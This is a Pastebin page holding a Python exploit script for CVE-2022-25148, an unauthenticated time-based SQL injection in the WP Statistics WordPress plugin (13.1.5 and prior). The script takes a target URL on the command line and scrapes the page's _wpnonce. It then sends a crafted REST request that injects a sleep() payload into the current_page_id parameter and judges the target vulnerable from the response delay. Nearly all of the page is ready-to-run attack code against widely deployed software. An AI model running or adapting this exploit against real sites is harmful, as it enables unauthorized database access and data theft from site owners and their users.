Advertisement
FlyFar

WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection - CVE-2022-25148

Jan 20th, 2024
805
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.91 KB | Cybersecurity | 0 0
  1. # Exploit Title: WP Statistics Plugin <= 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)
  2. # Date: 13/02/2022
  3. # Exploit Author: psychoSherlock
  4. # Vendor Homepage: https://wp-statistics.com/
  5. # Software Link: https://downloads.wordpress.org/plugin/wp-statistics.13.1.5.zip
  6. # Version: 13.1.5 and prior
  7. # Tested on: wp-statistics 13.1.5
  8. # CVE : CVE-2022-25148
  9. # Vendor URL: https://wordpress.org/plugins/wp-statistics/
  10. # CVSS Score: 8.4 (High)
  11.  
  12. import argparse
  13. import requests
  14. import re
  15. import urllib.parse
  16.  
  17.  
  18. def main():
  19.     parser = argparse.ArgumentParser(description="CVE-2022-25148")
  20.     parser.add_argument('-u', '--url', required=True,
  21.                         help='Wordpress base URL')
  22.  
  23.     args = parser.parse_args()
  24.  
  25.     baseUrl = args.url
  26.     payload = "IF(1=1, sleep(5), 1)"
  27.  
  28.     wp_session = requests.session()
  29.  
  30.     resp = wp_session.get(baseUrl)
  31.     nonce = re.search(r'_wpnonce=(.*?)&wp_statistics_hit', resp.text).group(1)
  32.     print(f"Gathered Nonce: {nonce}")
  33.  
  34.     headers = {
  35.         "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}
  36.  
  37.     payload = urllib.parse.quote_plus(payload)
  38.     exploit = f'/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={nonce}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id={payload}&search_query&page_uri=/&user_id=0'
  39.     exploit_url = baseUrl + exploit
  40.  
  41.     print(f'\nSending: {exploit_url}')
  42.  
  43.     resp = wp_session.get(exploit_url, headers=headers)
  44.  
  45.     if float(resp.elapsed.total_seconds()) >= 5.0:
  46.         print("\n!!! Target is vulnerable !!!")
  47.         print(f'\nTime taken: {resp.elapsed.total_seconds()}')
  48.     else:
  49.         print('Target is not vulnerable')
  50.  
  51.  
  52. if __name__ == "__main__":
  53.     main()
  54.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement